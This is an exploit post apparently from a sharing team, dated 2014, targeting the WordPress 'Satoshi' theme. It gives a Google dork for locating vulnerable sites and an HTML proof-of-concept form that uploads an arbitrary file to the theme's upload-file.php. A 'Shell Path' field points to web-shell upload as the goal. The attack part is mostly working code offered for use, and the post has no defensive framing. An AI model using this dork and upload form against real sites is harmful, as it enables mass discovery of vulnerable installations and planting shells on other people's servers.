Satoshi Theme - File Upload CSRF - 3xploi7 BuG

Satoshi Theme - File Upload CSRF

#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux


OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)

Submitter Anonymous
Verified No

-- Proof Of Concept --

When vuln : -


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Success : Succes

Shell Path : Here

3xploi7 Team
